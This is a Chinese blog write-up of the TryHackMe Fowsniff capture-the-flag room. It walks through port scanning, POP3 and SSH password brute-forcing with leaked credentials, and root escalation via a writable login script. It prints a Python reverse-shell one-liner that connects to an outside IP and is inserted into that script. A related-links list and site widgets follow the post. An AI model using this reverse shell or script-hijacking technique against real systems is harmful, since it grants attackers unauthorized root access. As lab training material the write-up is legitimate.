TryHackMe - Fowsniff CTF靶场

最新推荐文章于 2024-02-17 22:19:37 发布
最新推荐文章于 2024-02-17 22:19:37 发布
阅读量382 收藏
点赞数
分类专栏: Try Hack Me靶机 文章标签: 渗透测试 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/114307932
版权

Fowsniff CTF

Hack this machine and get the flag.

0x01 信息收集

先用Nmap工具对目标进行端口服务探测
 
打开Web服务扫一遍目录没有发现有价值的线索。但分析端口应该突破口为110端口的邮箱服务。
 
搜索一下名为fowsniff的公司,第一条为推特
 
点进去能看到有个介绍说这个是靶场的一部分,随后贴了一个pastebin.com的链接。
 
 
跟随链接跳转可以访问到一个带有邮箱账号密码的文件
 

0x02 POP3

把获得的账号及MD5解密后的密码用msf的pop3暴力破解模块尝试登录(手工试了前面两个都不行)
 
设置配置选项
 
获得账号密码
 
登录邮箱,list查看到存在两封邮件
 
retr 1 读取第一封,里面有个临时密码S1ck3nBluff+secureshell。stone的吗?
 
不管了,直接用hydra跑一遍,秒出结果,改密码对应的账号为baksteen
 

0x03 提权

登录成功
 
到了提权环节,到处翻一翻找到一个cube.sh的文件,674权限users用户组可以写
 
是个抬头的页面,感觉应该是这个了,在/etc目录下搜索调用该文件的程序。grep -r /opt/cube/cube.sh
 
每当用户登录时便会以root权限调用执行该文件
 

0x04 反弹回ROOT Shell

把python反弹shell的代码插入到cube.sh中,一旦用户登录便能弹回root的shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.250.203",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
退出重新登录一下,登录前要用nc监听弹回shell的端口
 
成功弹回root权限的shell
 
获得flag
z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf:xls加密_TryHackMe:匿名游乐场CTF编写
weixin_26753891的博客
08-21 781
ctf:xls加密In this article, I will be demonstrating my approach to completing the Anonymous Playground Capture The Flag (CTF), a free room available on the TryHackMe platform created by Nameless0ne. I h...
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 exiftool 哈希猫 开膛手约翰 GTFObins 尼克托 哈希标识符 ... 敲门(端口敲门)
Fowsniff: 1靶机入侵
weixin_30924087的博客
02-19 500
一、信息收集 1.存活主机扫描 arp-scan-l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018:~# nmap -A192.168.1.13 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 E...
vulnhub靶场Fowsniff
kukudeshuo的博客
08-01 293
vulnhub靶场Fowsniff 环境准备 靶机下载地址:https://www.vulnhub.com/entry/fowsniff-1,262/ 攻击机:kali(192.168.109.128) 靶机:Fowsniff(192.168.109.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.148 使用nmap扫描查看目标靶机端口开
渗透测试实战-Fowsniff靶机入侵
大方子
11-27 3967
机安装/下载 Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A   Kali的IP地址:192.168.100.8 WIN7的IP地址:192.168.100.9     先用nmap 进行探测 发现目标的IP地址为192.168.100.12 然后在进行靶机端口的探测 先从80端口下手看看 ...
TryHackMe - Dav靶场
z4yn:)的博客
03-12 271
Dav boot2root machine for FIT and bsides guatemala CTF 0x01 信息收集 常规Nmap扫描目标机器收集端口开放服务信息,只开放了一个端口 0x02 漏洞利用 接着就是网站目录扫描,用dirbuster扫描得到一个目录/webdav 搜索对应的文章看看:https://www.bilibili.com/read/cv4917037/ 上面写到可疑用cadaver 登录到服务。默认用户名是wampp,密码是xampp 登录成功 ..
TryHackMe-notes:该存储库包含我对TryHackMe房间的注释和文章(演练和ctf类型)
03-27
TryHackMe撰写该存储库包含我对TryHackMe房间的注释和文章。 什么是TryHackMe? 是一个在线课程,可通过动手练习和实验来学习网络安全!
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
TryHackMe-写信列出写作
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
渗透测试实战-Fowsniff靶机入侵-附件资源
03-05
渗透测试实战-Fowsniff靶机入侵-附件资源
[VulnHub靶机渗透] Fowsniff
人若无名,便可专心练剑
02-17 1078
靶机精讲之Fowsniff靶机,涉及诸多信息收集,比如web信息收集、媒体网站信息收集、工具站信息收集、pop3服务器信息收集,还涉及john和hydra密码暴力破解,crackmapexec密码碰撞,ssh的banner脚本提权等,可以到vulnhub下载靶机边看视频边实操,是一台构思精巧、全面磨练日常渗透技能的的高仿真靶机,非常值得学习。
红队打靶:Fowsniff打靶思路详解(vulnhub)
Bossfrank的博客
09-20 592
本文是vulnhub靶机Fowsniff的详细打靶过程。涉及到的知识点包括john密码md5破解、hydra密码碰撞、pop3邮件服务器登录、banner脚本提权等。靶机不难,重在思路,这个靶机涉及的剧情感觉还是非常符合实际情景,值得实操盲打!
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 497
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
TryHackMe - Res靶场
z4yn:)的博客
03-15 502
Res(Redis未授权利用) Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge! 0x01 信息收集 Nmap扫描目标机器开放端口信息,6379开放明显就是redis数据库。首先想到的就是redis未授权。 0x02 漏洞利用 用redis-cli连接目标机试试,info成功枚举出信息 目标机还开放了80端口,尝试写入...
【甄选靶场】Vulnhub百个项目渗透——项目五十二:Fowsniff-1(任务挟持)
人间体佐菲的博客
10-25 990
【甄选靶场】Vulnhub百个项目渗透——项目五十二:Fowsniff-1(任务挟持)
TryHackMe:Startup靶机实战
Mysmycbx的博客
04-02 167
通过尝试,无法在files目录下通过ftp上传文件,那这里进入files/ftp文件夹,然后重新上传shell.php,发现成功,同时在网页上发现了该文件,这里开启监听,然后打开该文件。lennie可以执行planner.sh文件,通过修改print.sh文件,写入反弹shell,成功获得root权限。anonymous尝试登录,登录成功,获取文件查看,其中有个ftp文件夹和两个文件,两个文件没有什么信息。上传linPEAS.sh,赋于权限,执行,发现了感兴趣的文件。kali机器获得这个名字为。
TRY HACK ME | INTERNAL「渗透测试挑战02」
AKAHRZ的博客
06-12 954
很简单的靶场,有手就行启动机器,连接openvpn,点击“Start Machine”获取目标IP,本次测试使用KAIL作为攻击机,连接成功后显示如下: 可以看到,这是一个apache的默认页面,根据题目的提示,我们需要先将主机添加到 /etc/hosts ,我们先nano 打开,然后将域名internal.thm添加上,我这里在MAC和KALI上都设置了,只显示一个MAC的页面供大家参考 然后,我们使用gobuster来爆破一波目录,命令构造如下: 可以看到扫描结果里,有wordpress页面,所以说
Vulnhub靶机检测不到IP地址
小小猪的博客
06-05 864
Vulnhub靶机检测不到IP地址 一、无法检测问题 从vulnhub下载靶机后,准备做测试时,使用Mac&kali无法检测到靶机的IP,arp-scan、nmap、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 二、排查 确保攻击机与靶机同处在一个网络环境。应该是网卡服务启动失败。这是导致获取不到IP的罪魁祸首。知道原因就有解决方法了。启动网卡服务!!! 三、解决步骤 因为靶机我们是不知道账号密码的。所以只能通过拯救模式进行操作,
03-reversing CTF
最新发布
06-06
03-reversing CTF是一种CTF(Capture The Flag)比赛中的一类,重点考察的是逆向工程技能。CTF比赛中,参赛者需要通过解决一系列的难题,获取旗帜(flag)来得分。在03-reversing CTF中,参赛者需要通过对程序进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值